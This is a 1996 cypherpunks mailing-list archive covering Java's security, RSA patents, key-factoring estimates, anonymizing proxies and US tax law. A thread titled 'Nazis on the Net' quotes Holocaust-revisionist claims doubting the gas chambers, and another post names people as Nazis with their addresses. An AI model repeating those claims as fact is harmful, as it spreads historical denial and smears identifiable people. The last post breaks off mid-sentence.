From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 27 Apr 1996 16:45:36 +0800
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Click here to become an International Arms Trafficker
In-Reply-To: <2.2.32.19960426091033.00688010@gateway>
Message-ID: <Pine.SUN.3.91.960426194348.11804A-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 26 Apr 1996, David K. Merriman wrote:

> Well, I'm ITAR violator # 6 :-)

I am #3.  Who is #1?  Gee, that sounds sorta familiar.  I hope
we don't end up as Prisoners.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zach Babayco <zachb@netcom.com>
Date: Sat, 27 Apr 1996 15:40:00 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: trusting the processor chip
In-Reply-To: <ada66cd5000210045f20@[205.199.118.202]>
Message-ID: <Pine.3.89.9604261948.A21433-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Apr 1996, Timothy C. May wrote:

[snip]

> 
> Though there have been fictional accounts--e.g. the French novel
> "Softwar"--about replacement of chips with TLA versions, this tack is very
> hard to pull off. (The Infoworld "April Fool's Day" 1991 report that the
> NSA had arranged for printers entering Iraq to be modified so as to send
> intelligence info was gullibly picked up by several outfits that should've
> known better and reported as fact.)
> 
Actually, the report said that the NSA had made chips with a virus on 
them, and that it supposedly knocked out some of their computers.  I 
think it was U.S. World & News that ran the story as fact, and stood by 
it even when it was proven to be false.  Makes you wonder if the media 
bothers to do any fact-checking when reporting, especially when reporting 
on computer topics these days.

zachb@netcom.com <----------- finger for public key (new key as of 4/23)
zachb@odyline.com


> --Tim May
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Licensed Ontologist         | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 27 Apr 1996 14:55:22 +0800
To: sameer@c2.org
Subject: Re: The Joy of Java
In-Reply-To: <199604270040.RAA09526@atropos.c2.org>
Message-ID: <199604270053.UAA22329@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


sameer@c2.org writes:
>> I go further. Java, as envisioned, cannot be made secure. It is too
>> powerful a language. Furthermore, it is unnecessary for the tasks that
>> it is used for, which are basically adding fancy wacky graphics and
>> simple applications and such to web pages.
>> 
>
>	Even though that is all it is used for now, I think it was
>*intended* to be used for more.

True.  It's still lacking a couple of (non-language) features.  The
most important (and most cpunks relevant) is a mechanism to pay people
to run programs for you.  This sort of thing is dangerous without a
safe environment.  If it was safe to do so, I can see about two hundred
PowerPC systems from where I sit that are idle 90% or more.  As more
users become permanently connected to the net (cable modems and such),
there will be *millions* of computers with a little processing power
each that are available for distributed tasks.

The next generation of "Toy Story" just might be done in near real-
time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 27 Apr 1996 14:51:51 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: RSA129
Message-ID: <Pine.SUN.3.93.960426200445.12146G-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



At one point someone asked about how the breaking of RSA129 might impact
on the calculation of MIPSyears to crack a 512 bit RSA key (i.e. a PGP 512
bit key).

Was there ever an answer to this question?

Are there current guesses for 1024 and 512 bit keys out there?


---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 27 Apr 1996 15:21:12 +0800
To: David Mazieres <dm@amsterdam.lcs.mit.edu>
Subject: Re: Golden Key Campaign
In-Reply-To: <199604262210.SAA27467@amsterdam.lcs.mit.edu>
Message-ID: <199604270019.UAA01587@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



David Mazieres writes:
> Isn't Rabin's algorithm patented, too?

There is no patent on Rabin per se.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 27 Apr 1996 14:53:33 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: The Joy of Java
In-Reply-To: <199604262131.RAA13066@universe.digex.net>
Message-ID: <199604270025.UAA01602@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
> Unfortunately, this last statement isn't really true.  To quote from the
> "Java Security" paper from some Princeton researchers:
> 
>     The Java language has neighter a formal semantics nor a formal
>     description of its type system.  We do not know what a Java program
>     means, in any formal sense, so we cannot reason formally about Java
>     and the security properties of the Java libraries written in Java.
>     Java lacks a formal description of its type system, yet the security
>     of Java relies on the soundness of its type system.

I will point out that complete formal semantics exist for other,
perfectly practical to use languages, like Scheme.

>     We conclude that the Java system in its current form cannot easily
>     be made secure.  Significant redesign of the language, the bytecode
>     format, and the runtime system appear to be necessary steps toward
>     building a higher-assurance system. . . . Execution of remotely-
>     loaded code is a relatively new phenomenon, and more work is
>     required to make it safe.
> 
> I do think that the ideas embodied in Java are very important, and will
> significantly shape the future of computing, but Java itself may be just
> a stepping stone on the way.

I go further. Java, as envisioned, cannot be made secure. It is too
powerful a language. Furthermore, it is unnecessary for the tasks that
it is used for, which are basically adding fancy wacky graphics and
simple applications and such to web pages.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 27 Apr 1996 15:00:36 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: alias servers  (al la alias.c2.org)
Message-ID: <Pine.SUN.3.93.960426203004.12146H-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



Is anyone besides c2.org running an alias server?



---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hochiminh@alpha.c2.org
Date: Sat, 27 Apr 1996 17:14:01 +0800
To: cypherpunks@toad.com
Subject: code vs cypher
Message-ID: <199604270331.UAA23746@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger" <perry@piermont.com> writes:

pm> tm> Timothy C. May writes:
pm> tm>  Well, I was not invited to join the elite and secret 
pm> tm>  coderpunks list,

pm> It is neither elite nor secret. It is fairly high signal to noise.
pm> I think only about one in every fifty or so cypherpunks
pm> messages has any content at all worth mentioning.

Agreed!  I wasn't "invited".  I simply requested access and
was quickly welcomed to the list.

pm> tm> but I still have some thoughts on coding and, 
pm> tm> especially, on the opportunities offered by Java. 
pm> tm> Sorry if this interferes with discussions of Rabbi 
pm> tm> Heir and Morris Dees.

pm> You have no right to grumble about the situation here.
pm> It is exactly what you wanted. Here you were, a person
pm> of some personal gravitas and moral authority, and you 
pm> put your stamp on the "post whatever you like; don't let 
pm> the grumbling censors stop you". Well, as you sow, so
pm> shall you reap. Its your fault, more than anyone else's.

TC May was not the first person to substantialy digress from
chartered topics but he certainly "ran with the ball" when he
got his chance to expose his ignorance and intolerance of
other races and religions ( the cypher-relevance or "charter
topicality of which always escaped me).  I was discouraged
by the encouragement given to the murder advocating moron,
Jim Bell to post his insance littany.

pm> If Cypherpunks has become a cesspit, well, its YOUR cesspit, 
pm> Tim. Its the list you always strove to create, but it appears 
pm> that you now don't like the smell of your own wallow. Well, 
pm> sorry. Deal with it.

Well put, Perry!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 27 Apr 1996 16:01:44 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: factoring estimates
In-Reply-To: <Pine.SUN.3.93.960426200445.12146G-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.93.960426202534.22851A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Apr 1996, Black Unicorn wrote:

> Are there current guesses for 1024 and 512 bit keys out there?

The best estimates from before the break of RSA130 is (see The Future of
Integer Factorization by Andrew M. Odlyzko):

bits	MY required	log base 2 of total instructions
428	1000		55
512	3*10^4		60
1024	3*10^11		83
2048	3*10^20		113

The factoring of RSA130 proved that a 432 bit number takes only
500 MIPS-years.  Therefore the above estimates should be divided by 2:

432	500		54
512	1.5*10^4	59
1024	1.5*10^11	82
2048	1.5*10^20	112

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 27 Apr 1996 15:10:26 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: WWW proxies?
In-Reply-To: <Pine.SUN.3.93.960426191223.12146D-100000@polaris.mindport.net>
Message-ID: <199604270050.UAA01645@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn writes:
> Has anyone developed such a beast yet?

The CERN HTTP server is a proxy out of the box.

> Will we have as extensive a WWW proxy network as remailer network?

Unclear.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 27 Apr 1996 16:27:10 +0800
To: sameer@c2.org
Subject: Re: Golden Key Campaign
In-Reply-To: <199604270039.RAA09438@atropos.c2.org>
Message-ID: <199604270101.VAA01670@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



sameer@c2.org writes:
> > David Mazieres writes:
> > > Isn't Rabin's algorithm patented, too?
> > 
> > There is no patent on Rabin per se.
> 	What do you mean by "per se"? 

Rabin is covered by the patents on public key itself. It is the
contention of RSA DSI that the patent on RSA claims all public key
methods that use exponentiation. I do not believe this to be the case,
but I am not the god of patents. There is no direct patent on Rabin,
however.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 27 Apr 1996 15:46:51 +0800
To: sameer@c2.org
Subject: Re: The Joy of Java
In-Reply-To: <199604270040.RAA09526@atropos.c2.org>
Message-ID: <199604270111.VAA01682@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



sameer@c2.org writes:
> > I go further. Java, as envisioned, cannot be made secure. It is too
> > powerful a language. Furthermore, it is unnecessary for the tasks that
> > it is used for, which are basically adding fancy wacky graphics and
> > simple applications and such to web pages.
> 
> 	Even though that is all it is used for now, I think it was
> *intended* to be used for more.

So much the worse.

I don't think its a good idea to download random programs and run them
without even realizing it, especially when they run in an execution
environment which is not particularly emasculated. I don't think this
can be made particularly secure in the general case. It is a bad
paradigm. I've said it before, and everything we've seen thus far
about Java supports my contention.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 27 Apr 1996 15:17:45 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: The Joy of Java
In-Reply-To: <199604270053.UAA22329@universe.digex.net>
Message-ID: <199604270123.VAA01708@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
> True.  It's still lacking a couple of (non-language) features.  The
> most important (and most cpunks relevant) is a mechanism to pay people
> to run programs for you.  This sort of thing is dangerous without a
> safe environment.

You can do that safely without making it dangerous for your machine. I
know how I would build a restricted execution environment for such
markets. However, Java is 1) too slow, since if you are selling
rendering cycles or such you don't want to be running an interpreter,
2) insufficently safe, and 3) paradoxically, insufficiently powerful
for the sort of code you would want to run in such an environment.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 27 Apr 1996 16:42:01 +0800
To: cypherpunks@toad.com
Subject: Re: Nazis on the Net
In-Reply-To: <Pine.LNX.3.91.960426222544.371C-100000@crash.suba.com>
Message-ID: <Pine.GUL.3.93.960426211955.6711B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Apr 1996, Snow wrote:

> Sorry about spewing this to the List, but nobody@replay.com would not get
> it back to him.

I'm glad *somebody* realized that. I believe there have been at least a
half dozen messages Cc'd to nobody in the last couple days. 

[everything of "substance" deleted]

>         While I understand why you use a remailer, I wish you'd post some
> address that I could send mail to rather than cluttering up the list.

Based on other discussions we've had, I believe I've sent Nobody the FAQ
for the alpha.c2.org remailer. Another, minimum alternative would be to
post anonymous messages with a PGP signature. This would at least answer
the questions of whether the Mr. Nobody that posted the Iron Mountain
hoax is the same Mr. Nobody who spews about Dresden. 

If Nobody needs help getting an alpha.c2.org account to work, and he
doesn't trust anybody here, then I recommend whitewolf@alpha.c2.org, an
avowed National Socialist who 1) will not betray Nobody's trust and 2) is
not subject to surveilance, because all messages to him will arrive
PGP-encrypted, to be read offline.

Another Nazi who seems to know a lot about how alpha.c2.org works, because
he traced my friend Erin's nym back with a traffic-analysis spam, is
ralphj@eskimo.com. I would recommend "Dave Harmon," but he had his netcom
account yanked because he kept forging cancels for my and others' Usenet
posts, among other things I can't talk about. I believe the same person
can be reached through the penet.fi pseudonym "Skipper's Hammer," though. 

Hope this helps. At least with a stable nym, we'd be able to flame you for
off-topic posts.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Olmur <olmur@dwarf.bb.bawue.de>
Date: Sat, 27 Apr 1996 14:07:45 +0800
To: cypherpunks@toad.com
Subject: Re: An idea for refining penet-style anonymous servers
In-Reply-To: <Uc5fx8m9LojB085yn@netcom.com>
Message-ID: <199604262029.WAA00905@dwarf.bb.bawue.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Alan" == Alan Bostick <abostick@netcom.com> writes:

[.....]

Alan> There is a way that attackers who have seized or copied the
Alan> database can search it - by trying it out on anonymous IDs, or
Alan> user addresses, until they hit paydirt.

I think that's exactly where the problem lies.  The advantage of your
proposal is, that for an honest SysOp your system makes it easier not
to look on the database, but I assume that Julf isn't interested in
the contents of the database anyways..

But for a real attacker it's just a small inconvinience, nothing more.


Alan> So what do people think of this scheme of mine?  Are there
Alan> drawbacks or weaknesses that I'm not seeing?

I think it's similar to a postmaster running a script to automatically
removing the actual message from a bounced mail, before she looks at
it.  But I don't think it's really making penet-style servers more
secure.


Have a nice day, and hope your flu cured now!

Olmur
- --
"If privacy is outlawed, only outlaws will have privacy" --- P. Zimmermann
      Please encipher your mail!  Contact me, if you need assistance.

finger -l mdeindl@eisbaer.bb.bawue.de for PGP-key
         Key-fingerprint: 51 EC A5 D2 13 93 8F 91  CB F7 6C C4 F8 B5 B6 7C



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMYEyKA9NARnYm1I1AQFZaQP/Q6jt+o1oDLysFTcxkitZF5aaQbwNa0Z6
Ud/oJqeTZvVtbltbJ7CIAIQCHydYLnBcxbeAw3EJDPpMYXaVz0Lsd00cdggD8Uh4
nY6dc4MaWvU0Kv1QUsdBlsIzpPwqvB9+WnXFQxcu/DONQT5pNkkzJWRGoHNj6+f4
kr31q2gniis=
=M/jY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Snow <snow@crash.suba.com>
Date: Sat, 27 Apr 1996 16:24:10 +0800
To: cypherpunks@toad.com
Subject: Re: Nazis on the Net
In-Reply-To: <199604231853.UAA04047@utopia.hacktic.nl>
Message-ID: <Pine.LNX.3.91.960426222544.371C-100000@crash.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry about spewing this to the List, but nobody@replay.com wouldnot get 
it back to him.

On Tue, 23 Apr 1996, Anonymous wrote:
> E. ALLEN SMITH writes:
> | (one reason for Hiroshima and Nagasaki being right
> | was the Japanese alliance with Germany)
> Was Dresden also right? (more died than at Hiroshima)  The firebombing

	Yes. War, especially in the modern era requires a large 
industrial base to maintain (well, non-guerilla operations anyway) 

> of Tokyo? (10% died in one raid).  Stalins execution of his own people?

	Yes, as above.               To accomplish his goals, yes. IMO, no. 

> Look at facts, not propoganda, before coming to such conclusions.
> The conventions of war (namely the aim of keeping civilians out of it,
> along with good treatment of prisoners) evolved over many centuries,

	Centuries? Maybe 3 of them, the 1600's, 1700's and 1800's, more 
like never.

> but then come the Brits and the Yanks to destroy it all with their
> indiscriminate bombing of civilians, using the "they can stop the
> torture simply by surrendering," and "those bombs saved countless

	There has been a long history of taking the war to the civilians. 
Salting crop land, poisoning wells, burning cities--long before Sherman 
marched on Atlanta civilians were targets. The Aristocracy didn't 
approve publically, but what does a blockade accomplish if not to deprive 
civilians of certain things? Yes, it also keeps it out of the hands of 
the Military, but it also affects non-military. 

> [American/British] lives!" excuses, and directing attention away from
> their own attrocities by spreading propoganda such as soap made from
> Jews.  Then to direct attention away from themselves even further, the
> victors judge the defeated at Nuremburg for "war crimes," when the
> accusors themselves were guilty of terror bombing, the worst war crime
> of them all.

	War is a most nasty thing, and often fought by people who are at 
very impressionable age (young men). Watching your friends and buddies 
die is a tough thing for most, as is killing other people. For most 
people killing is not something to be done lightly, and it is necessary 
to work them into a state were killing is possible. This state also tends 
to make certain actions seem like a good idea. 

	As to the Strategic decesions like the bombing of Dresden and the 
Nuking of Japan, well, when is the last time a Political leader (and High 
Ranking Generals ARE Political Leaders) actually stopped to consider the 
lives or feelings of people that aren't going to vote for hir?

> | and the Holocaust (people who claim
> | it didn't happen are calling my paternal grandfather a liar).
> 
> Does anybody really claim it did not happen?  I doubt it.
> I assert that those who express doubt over details of the current
> story (such as the numbers that died in the camps, the existence of
> gas chambers, or whether Hitler gave an order to systematically kill
> Jews) are referred to by the media as saying that the Holocaust didn't

	I doubt Hitler explicitly said "Kill all the jews for me would 
you Gobby?" but hey, the guy was the ABSOLUTE RULER, he made his desires 
known, and things happened. 

> happen, but that is *not* what they are saying.  With regard to your
> hundreds of thousands of people died, then who would disagree with him?
> If on the other hand he asserts that he saw gassed Jews at Dachau,
> then he is mistaken (although not necessarally a liar.)

	I don't know enough WWII history to know how the Nazis were 
attempting to solve the "Jewish Problem" at Dachau, but I hear that 
Belson was a Gas <sorry>

> The Nuremberg Trials...had been popular throughout the world and
> particularly in the United States.  Equally popular was the sentence
> already announced by the high tribunal: death.  But what kind of trial was
> this?  ...The Constitution was not a collection of loosely given political
> promises subject to broad interpretation.  It was not a list of pleasing
> platitudes to be set lightly aside when expediency required it.  It was
> the foundation of the American system of law and justice and [Robert Taft]
                        ^^^^^^^^^^^^^^^^^^^^^^

> was repelled by the picture of his country discarding those Constitutional
> precepts in order to punish a vanquished enemy.

	I wasn't aware that the US Constitution could be applied outside 
the US. 

 	While I understand why you use a remailer, I wish you'd post some 
address that I could send mail to rather than cluttering up the list. 



Petro, Christopher C.
petro@suba.com (prefered)
snow@crash.suba.com 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Wagner <daw@cs.berkeley.edu>
Date: Sat, 27 Apr 1996 17:46:33 +0800
To: unicorn@schloss.li
Subject: Re: WWW proxies?
Message-ID: <199604270555.WAA00661@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.SUN.3.93.960426191223.12146D-100000@polaris.mindport.net> you write:
> 
> Has anyone developed such a beast yet?
> 
> Will we have as extensive a WWW proxy network as remailer network?
> 

Here's what I know of.


You could get an anonymous www.c2.org account and websurf
from it.  You can also publish web pages anonymously
from c2.  See
	http://www.c2.org/anon.phtml

It looks like there's an experimental anonymizing proxy
up in France (if you can tolerate the link delay):
	http://hplyot.obspm.fr:6661/
	http://hplyot.obspm.fr:80/~dl/anonproxy.txt
I haven't tested it myself, though.

CMU has a web anonymizer at
	http://anonymizer.cs.cmu.edu:8080/
Unfortunately, it's not useable by the public yet.  (They
promise to release it in early 1996.)

Decense is a early prototype of a double-blind penet-style
"re-webserver":
	http://www.clark.net/pub/rjc/decense.html

Wei Dai has talked about PipeNet, a network of "re-routers"
for general Internet traffic.  Unfortunately, at this point,
it's only a pipe dream on the whiteboard (as far as I know--
correct me if I'm wrong!).


If I left any out, let me know.

I hope to get a chance to play with these things (and possibly
install one on my machine) during the summer, when I'll have
some more free time.  Whee!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 27 Apr 1996 18:00:42 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Nazis on the Net
In-Reply-To: <Pine.LNX.3.91.960426235849.371H-100000@crash.suba.com>
Message-ID: <Pine.GUL.3.93.960426231143.6711C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996, Snow wrote:

> On Thu, 25 Apr 1996, The Troll wrote:
> > It is because of such baseless inferences, I have to remain anonymous.  I would
> > dearly love to debate under my real name, but am prevented from doing so by the
> > neo-Nazi name-calling.
> 
>         No, you aren't. Get a fscking freenet account so we can take this
> to email.

Who says he doesn't have one?

This is the most un-PC place you can get. He's just trolling.

For all you wonderful open-minded folks who have made up your mind about
me, please see http://www-leland.stanford.edu/~ajg/ for an ACCURATE
perspective on my character and views that should surprise just about
everybody who has trolled here. 

Please note that ajg has already received dozens of comments, has already
turned in the paper, and is very busy on another. She knows about a few
typos and technical errors, and she knows that she misquoted me once.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Snow <snow@crash.suba.com>
Date: Sat, 27 Apr 1996 16:41:25 +0800
To: cypherpunks@toad.com
Subject: Re: Golden Key Campaign
In-Reply-To: <Pine.SUN.3.93.960424141313.12174A-100000@eskimo.com>
Message-ID: <Pine.LNX.3.91.960426232131.371F-100000@crash.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


In for a dime, in for a dollar.

On Wed, 24 Apr 1996, Wei Dai wrote:
> You can do signatures with Rabin too.  I have a version of it in
> Crypto++ 2.0.  It's been out for a while and RSA hasn't bothered me about
> it.
> Does anyone want to explain why, given the alternatives, people continue
> to use RSA and pay for it?

	Reputation Capital?


Petro, Christopher C.
petro@suba.com <prefered>
snow@crash.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 27 Apr 1996 18:13:25 +0800
To: David Mazieres <dm@amsterdam.lcs.mit.edu>
Subject: Re: RSAREF dos not give you access to RSA
Message-ID: <199604270629.XAA05305@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:48 PM 4/26/96 -0400, David Mazieres <dm@amsterdam.lcs.mit.edu> wrote:
>> 5) the price of RSA is fairly low, once free RSAREF came out
>RSAREF does not give you RSA.  Do not think that you can write and
>distribute free software that uses RSA encryption in the US just
>because of the existence of RSAREF.  If you don't believe me, let me
>tell you a little story.
        [ really atrocious story of RSA's non-responsiveness, deleted]
>The RSAREF license strictly requires that you only use the documented
>RSAREF interface, which does not include direct access to the RSA functions.

Yeah, that's a good point, and it'd slipped my mind since the
PGP permission was eventually granted.  For some applications of RSA,
you can use RSAREF to do them; you may have to not mind an extra DES
layer thrown in where you really don't need it, and the resulting
ugliness.  (But at least encrypting a random session key with a random
DES key doesn't provide much hook for a DES-cracker.)
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 27 Apr 1996 17:39:53 +0800
To: Black Unicorn <ml3e+@andrew.cmu.edu>
Subject: Re: US law - World Law - Secret Banking
Message-ID: <2.2.32.19960427033035.00d183b0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:55 PM 4/26/96 -0400, Black Unicorn wrote:

>First of all, and as one of the only western powers to do so, the United
>States taxes its citizens on _worldwide income_.  While this in itself,
>with a proper foreign tax credit system, is not offensive, when the Unites
>States adds to this a very wide scope of extraterratorial jurisdiction and
>compelled process, it becomes more than tax.  Further, the United States
>implements policy it cannot directly legislate constiutionally through
>taxation.

Just to make it perfectly clear...

The US (and the Philippines) are the only countries in the *civilized world*
that tax non-resident citizens.  This means, par example, that if you are
born in the US and leave at the age of 2 days, never return, never get any
services from any US government, you are subject to full US federal
taxation.  If you happen to reside in a country with no tax treaty with the
US, you will owe local country taxes *plus* US federal taxes simply because
of citizenship.  In any of the European countries, you can eliminate your
tax liability for foreign (out-of-country) source income simply by moving
overseas.  They tax all residents but only non-resident citizens who have
domestic source income.  The US grabs everything even if you've had
virtually no US contacts.

This is why some rich Americans have renounced their citizenship to avoid
taxes on their non-US income, rich Brits don't have to renounce they can
keep their citizenship and just move.

>It is partly the arrogance of many U.S. citizens, and the view that their
>government knows the one single way to conduct economic and foreign
>affairs, that empowers the United States to impose her tax and
>economic policy on unconnected sovereigns thousands of miles away.

Note the other areas this has applied as well.  Roosevelt's outlawry of
private posession of gold by Americans made it a crime for Americans to own
gold anywhere on earth.  And the proposed regs on licensing of space
launches prohibited Americans from committing unlicensed space launches
anywhere on earth.

DCF

"Note that no woman has ever conquered Europe but several men have.  No
point, I just thought it was interesting."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dp@world.std.com (Jeff DelPapa)
Date: Sat, 27 Apr 1996 17:19:11 +0800
To: cypherpunks@toad.com
Subject: re: Joy of Java
Message-ID: <199604270335.AA06305@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner  <sjb@universe.digex.net> wrote:
>
>And later:
>
>    The Java bytecode is where the security properties must ultimately
>    be verified . . . .  Unfortunately, it is rather difficult to verify
>    the bytecode. . . .  The present type verifier cannot be proven
>    correct, because there is not a formal description of the type
>    system.  Object-oriented type systems are a current research topic;
>    it seems unwise for the system's security to rely on such a
>    mechanism without a strong theoretical foundation.  It is not
>    certain that an informally specified system as large and complicated
>    as Java bytecode is consistent.
>
>And in the conclusions:
>
>    We conclude that the Java system in its current form cannot easily
>    be made secure.  Significant redesign of the language, the bytecode
>    format, and the runtime system appear to be necessary steps toward
>    building a higher-assurance system. . . . Execution of remotely-
>    loaded code is a relatively new phenomenon, and more work is
>    required to make it safe.
>
>I do think that the ideas embodied in Java are very important, and will
>significantly shape the future of computing, but Java itself may be just
>a stepping stone on the way.

Given the crowd here, this is likely stating the obvious, but it has
never failed to provoke spluttering from the Sun employees I have
tried it on.

The thing not mentioned in this excerpt is that at best, the
verification will have been done for the Sun implementation of the
byte code engine.  There have been announcements of competing
implementations of the the engine, and any assumptions of safety are
out the window in that case.

Sun doesn't have any control over Java the byte code engine, anyone
who wants can build one.  (and at 40kb total size, it is a tractable
thing for an undergrad that didn't manage to find a summer job).  Sun
does control Java the logo, and can deny a license to use it.  That is
likely to become a meaningless distinction -- If somone will install a
disk recieved unsolicited in the mail, or handed to them at a trade
show (how hard can it be to re-seal AOL packaging, such that a casual
recipient won't notice), they aren't bright enough to insist on
genuine Sun brand Java.

If it becomes an expected thing, that all browsers/os's/toaster-ovens
have a java byte code engine in them, there will be a sizable number
sold without "benifit" of trademark (at the low end if nothing else,
Sun does expect to be paid to use the steaming cup).  Not all of them
will have sufficient rigor applied to their development.

Once common, then things get interesting.  The press will (for lack of
anything else to do, as all the engines are supposed to act
identically) start to benchmark the competing implementations.  At
that point, under pressure to "get good numbers", some of the more
"expensive" operations will be "tuned".  Other restrictions might be
sacrificed in order to have something ready for Comdex...

Can't happen you say?  I still remember when some of the PC video
makers got caught special casing the strings in one of the big
magazines benchmarks.

Unfortunately, Sun has designed a fine example of a "Square Peg".  As
OAK, it was a moderately good fit for the intended use.  With zillions
of set top boxes, and a limited number of sources of product
(national/regional controlled entry broadcaster model), you had to
have remote execution, nobody could build a big enough set of servers.
Since it was coming from a broadcaster, you could get away with
trusting signed code -- not just any bozo can get video broadcast
nationally (unless it is violent, and even then they time base correct
it), the same would be true of set top code.

Since it meant selling hardware (engine in rom), there would be a
limited number of sources of system code -- the above mentioned
undergrad would find it difficult to find enough capital to get a mass
market hardware product to market.  And when you get down to it, with
only a few meg of ram, and no disk, there really wasn't a huge amount
of data to compromise.

Now lets examine what they are trying to do with it.  It is a software
only item currently, thus it has very low entry barriers.  Code can be
put up by any bozo with $10/month to pay a local web provider -- even
if the code is signed, you may not be able to get at the author of an
applet, either because of national boundries, or anonymity. And you
get to run the stuff on a machine with a lot of state (all the dells
and gateways sold today had at least a gig of state spinning there to
browse), and a live net connection (back to the source if nothing
else) to transmit interesting things back with.

Looks like a bad fit to me.  But the PR department does have a big
hammer, and they are beating on it, and the hole is starting to give a
